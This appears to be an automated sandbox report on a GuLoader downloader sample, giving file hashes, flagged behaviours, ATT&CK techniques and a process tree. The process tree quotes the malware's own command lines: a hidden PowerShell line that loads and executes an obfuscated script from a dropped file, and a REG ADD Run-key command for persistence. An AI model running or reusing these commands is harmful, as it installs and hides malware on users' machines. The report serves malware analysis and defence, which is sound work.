Overview

overview

10

Static

static

3

3b3d77d803...9c.exe

windows7-x64

10

3b3d77d803...9c.exe

windows10-2004-x64

10

$PLUGINSDI...er.dll

windows7-x64

1

$PLUGINSDI...er.dll

windows10-2004-x64

1

$PLUGINSDI...ge.dll

windows7-x64

1

$PLUGINSDI...ge.dll

windows10-2004-x64

1

$PLUGINSDI...gs.dll

windows7-x64

3

$PLUGINSDI...gs.dll

windows10-2004-x64

3

Analysis

  • max time kernel
    122s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    26-06-2024 01:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exe

  • Size

    489KB

  • MD5

    fa45fc9a0330174313e4e08e31d22181

  • SHA1

    ceb0106d1e8709456e8be6f842badbebde62b567

  • SHA256

    3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c

  • SHA512

    5939798d1adc2e30f4b53f8e1a2ebe670f2a34b42a6551b24fa0f86f632aeda13dea009489602d4189581cb4bae442d9aecccc3a7020886e560fc07142a61d5b

  • SSDEEP

    12288:/qgow9mQ72+RS2x0mcNasY75T3vCVvMWBFbwLkM:x9mg5Sc7kvhFbwT

Score
10/10
guloaderdownloaderexecutionpersistence

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Loads dropped DLL 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exe
    "C:\Users\Admin\AppData\Local\Temp\3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1924
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Informationsmngders155=Get-Content 'C:\Users\Admin\AppData\Local\Temp\overmandede\Metran\menubilledet\Aspalathus205.Sno';$Bygningattestens=$Informationsmngders155.SubString(71040,3);.$Bygningattestens($Informationsmngders155)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2724
      • C:\Program Files (x86)\windows mail\wab.exe
        "C:\Program Files (x86)\windows mail\wab.exe"
        3⤵
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of WriteProcessMemory
        PID:2696
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "teatertordens" /t REG_EXPAND_SZ /d "%Grandeval% -windowstyle minimized $Subereous=(Get-ItemProperty -Path 'HKCU:\huxleian\').Salgsenhederne;%Grandeval% ($Subereous)"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2784
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "teatertordens" /t REG_EXPAND_SZ /d "%Grandeval% -windowstyle minimized $Subereous=(Get-ItemProperty -Path 'HKCU:\huxleian\').Salgsenhederne;%Grandeval% ($Subereous)"
            5⤵
            • Adds Run key to start application
            • Modifies registry key
            PID:2856

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Persistence

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Defense Evasion

Modify Registry

2
T1112

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1
T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\overmandede\Metran\menubilledet\Aspalathus205.Sno
    Filesize

    69KB

    MD5

    a88b20a14329d1a11a3a2c8a6abfefd7

    SHA1

    40a7ca63f9cf6ab08e4fb057cbb68814c329d440

    SHA256

    7f5dc21864aed86bbc14e1a4e44e2f6b9cf48fef09f5d69ce4ef330dd0476606

    SHA512

    54baf64f8ce1740ce1822fc21100f0836baa33b5340421d778de39c3a7468e615638e1a4017d49d4a08c7e0dbcff1a59143ccd18a89b87310da59bba785a2b8c

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\overmandede\Metran\menubilledet\Deserving.Ino
    Filesize

    346KB

    MD5

    cec7cb698dfeafe0b5548d514ab1d2f9

    SHA1

    14786f14dc829be8fb518cec820d7fc25891c90c

    SHA256

    7a11597b9a5649a5e346b05aabcc1c965867d82d54cd4bf009e34c5d79b54016

    SHA512

    8baecb90058b24cf0f9876219ad9eda86454ba494b717f510282b5ba3c74c2ab56f116636c6f505805293b190c6ccde1f290c98c91e9090322dd87171ab253ae

    Download Submit
  • \Users\Admin\AppData\Local\Temp\nsy206D.tmp\Banner.dll
    Filesize

    4KB

    MD5

    843657eaf7240b695624dcf38bb0eb31

    SHA1

    ca99a44e737fdeaab56f864ce1ef15a57d2eec90

    SHA256

    b935d14c32ad8e16055f7f5794ac3411e601c5ac93155afc623f25b08e2ab82e

    SHA512

    7773d9f6bbd17253d1c96ce225b2f9d3673969b38177afef236d1c5d4aabaae2c07793e07c34f0281ec3b859ae955e83bfe43a598ce7cc6c893ec8c9604f5de3

    Download Submit
  • \Users\Admin\AppData\Local\Temp\nsy206D.tmp\BgImage.dll
    Filesize

    7KB

    MD5

    a98576f0d6b35b466cb881860977fdbc

    SHA1

    28b3dbbd76f15c876b98dce523100aa3256d193a

    SHA256

    6cc4aadae46ee3e7f39b411ba087ec29bc10aa62b6b5b44003c934b3c51cefe2

    SHA512

    29225bfb30e72d7d3d3571e7562b5901dbf2382af1972cc9a2be8e3bef697b9ac9e0aaac3a9bca191da827ad3cfce7f6876e8be9444663e83a7e2e86788a733c

    Download Submit
  • \Users\Admin\AppData\Local\Temp\nsy206D.tmp\nsDialogs.dll
    Filesize

    9KB

    MD5

    2c84faebfda2abe3b16fdf374df4272f

    SHA1

    a5b0258a94e0440aefe1ef320e62e7a9a1c8bb40

    SHA256

    72b38e4cca0af336655d55501c4ea05080baaa9921a62a2d717afe90bb801004

    SHA512

    207164cc6914c59d9f4f3b8ae97628c544093ba6ecda9f8da351f453cd97e03be7a640264b8686b2d5e6f3c787f4df1d8a1ebc8e51fd788a97460cd981cc015e

    Download Submit
  • memory/2696-61-0x0000000001C80000-0x0000000006185000-memory.dmp
    Filesize

    69.0MB

    Download
  • memory/2696-39-0x0000000000C10000-0x0000000001C72000-memory.dmp
    Filesize

    16.4MB

    Download
  • memory/2724-28-0x0000000072F61000-0x0000000072F62000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2724-32-0x0000000072F60000-0x000000007350B000-memory.dmp
    Filesize

    5.7MB

    Download
  • memory/2724-31-0x0000000072F60000-0x000000007350B000-memory.dmp
    Filesize

    5.7MB

    Download
  • memory/2724-36-0x0000000006720000-0x000000000AC25000-memory.dmp
    Filesize

    69.0MB

    Download
  • memory/2724-37-0x0000000072F60000-0x000000007350B000-memory.dmp
    Filesize

    5.7MB

    Download
  • memory/2724-30-0x0000000072F60000-0x000000007350B000-memory.dmp
    Filesize

    5.7MB

    Download
  • memory/2724-29-0x0000000072F60000-0x000000007350B000-memory.dmp
    Filesize

    5.7MB

    Download